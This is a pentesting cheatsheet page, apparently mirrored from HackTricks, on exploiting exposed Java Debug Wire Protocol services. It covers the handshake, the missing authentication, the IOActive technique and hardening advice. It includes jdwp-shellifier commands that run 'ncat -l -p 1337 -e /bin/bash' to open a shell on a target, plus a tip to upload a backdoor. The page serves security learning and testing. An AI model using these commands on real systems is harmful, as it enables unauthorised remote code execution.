daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pentesting-jdwp-java-debug-wire-protocol.md (4985B)


      1 ---
      2 title: "Pentesting JDWP - Java Debug Wire Protocol"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Pentesting JDWP - Java Debug Wire Protocol
     14 
     15 ## Exploiting
     16 
     17 JDWP provides debugger-level control and the wire protocol itself has no authentication or encryption. A listening `dt_socket` transport may be bound to any configured address and port; 8000 is only a common convention. The debugger sends the 14-byte ASCII string `JDWP-Handshake`, and a JDWP peer replies with the same string.<sup>[[3]](#references)[[4]](#references)</sup>
     18 
     19 Locally, inspect Java command lines for `-agentlib:jdwp`, legacy `-Xrunjdwp`, or `jdwp` rather than the typo `jdwk`. Binding only to loopback or using an SSH tunnel reduces exposure but does not add protocol authentication.
     20 
     21 `jdwp-shellifier` is a common exploitation client. The maintained Hugsy fork retains the original IOActive technique and command-line interface:<sup>[[2]](#references)[[9]](#references)</sup>
     22 
     23 ```bash
     24 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
     25 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
     26 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
     27 ```
     28 
     29 I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
     30 
     31 ## More details
     32 
     33 **This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.<sup>[[1]](#references)</sup>
     34 
     35 1. **JDWP Overview**:
     36 
     37    - It is a packet-based binary protocol; most commands use a synchronous request/reply model, while events are asynchronous.<sup>[[3]](#references)[[4]](#references)</sup>
     38    - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.
     39 
     40 2. **JDWP Handshake**:
     41 
     42    - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).
     43 
     44 3. **JDWP Communication**:
     45 
     46    - Messages have fields such as length, ID, flags, and command set.<sup>[[4]](#references)</sup>
     47    - CommandSet values range from 0x40 to 0x80, representing different actions and events.
     48 
     49 4. **Exploitation**:
     50 
     51    - Debugger commands can inspect classes, set breakpoints, create values, and invoke methods; exploit tools compose these primitives into command execution.<sup>[[5]](#references)</sup>
     52    - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.
     53 
     54 5. **Real-Life Exploitation**:
     55 
     56    - Exposed services and unsafe launch configurations can be found through asset search and code/configuration review.<sup>[[7]](#references)[[8]](#references)</sup>
     57    - The original exploit was tested across several historical JDK versions and operating systems, but command execution still requires a suitable loaded class, breakpoint/event, permissions, and target runtime behavior.<sup>[[6]](#references)</sup>
     58 
     59 6. **Security Implications**:
     60    - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
     61 
     62 ## References
     63 
     64 - [1] [Hacking the Java Debug Wire Protocol – or – "How I met your Java debugger"](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)
     65 - [2] [IOActive/jdwp-shellifier GitHub repository](https://github.com/IOActive/jdwp-shellifier)
     66 - [3] [Oracle — Java Platform Debugger Architecture](https://docs.oracle.com/en/java/javase/21/docs/specs/jpda/architecture.html)
     67 - [4] [Oracle — Java Debug Wire Protocol specification](https://docs.oracle.com/en/java/javase/21/docs/specs/jdwp/jdwp-protocol.html)
     68 - [5] [Nmap — `jdwp-exec` NSE script](https://nmap.org/nsedoc/scripts/jdwp-exec.html)
     69 - [6] [Packet Storm — JDWP exploitation paper and PoC](https://packetstormsecurity.com/files/122525/JDWP-exploitation.txt)
     70 - [7] [Shodan search — JDWP-Handshake](https://www.shodan.io/search?query=JDWP-Handshake)
     71 - [8] [GitHub code search — JDWP launch options](https://github.com/search?q=%22-Xrunjdwp%22&type=code)
     72 - [9] [hugsy/jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)